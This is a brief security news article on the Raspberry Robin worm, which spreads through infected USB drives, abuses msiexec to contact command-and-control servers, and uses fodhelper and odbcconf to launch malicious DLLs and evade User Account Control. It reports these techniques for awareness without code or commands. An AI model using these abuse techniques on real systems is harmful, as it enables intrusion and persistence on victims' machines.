New malware with worm capabilities was recently found in Windows distributed using external flash drives. Researchers added that the new malware is associated with the Raspberry Robin worm they first identified last September.
Most sectors targeted by the worm are manufacturing and technology, with multiple customers’ networks being infected. This new worm injects into the Windows Operating System upon detecting an infected USB drive connected to the device. It will then execute a process through cmd.exe to launch an infectious file from the compromised external flash drive.
The Raspberry Robin worm abuses the MS Standard Installer or msiexec.exe to communicate to its threat operators’ command-and-control servers. While the Microsoft Installer begins to download and launch multiple installer packages, the operators laterally deliver malware to the targeted machine.
Experts have yet to identify which methods the Raspberry Robin worm uses in establishing persistence.
However, they presume that the malware mounts a malicious DLL file on the infected machines to avoid removal during a system restart.
The malicious DDLs are launched through two Windows utilities, fodhelper and odbcconf. The first utility, fodhelper, allows the DDL to evade User Account Control and the second one helps launch and configure the said DLL.
Despite an in-depth assessment of the Raspberry Robin worm, security analysts are still left with questions about it. One point is that it is still unknown how the newly detected worm infects the external USB drives to commence its malicious activity. Moreover, they also have no idea about mounting malicious DLLs’ purpose.
To bring a hypothetical answer to their points, the security analysts added that the threat operators could be attempting to establish persistence in the infected networks through the USB drives. Nonetheless, they are still working on further assessing the new worm’s malicious activity, alongside knowing the goals of its malicious operators.
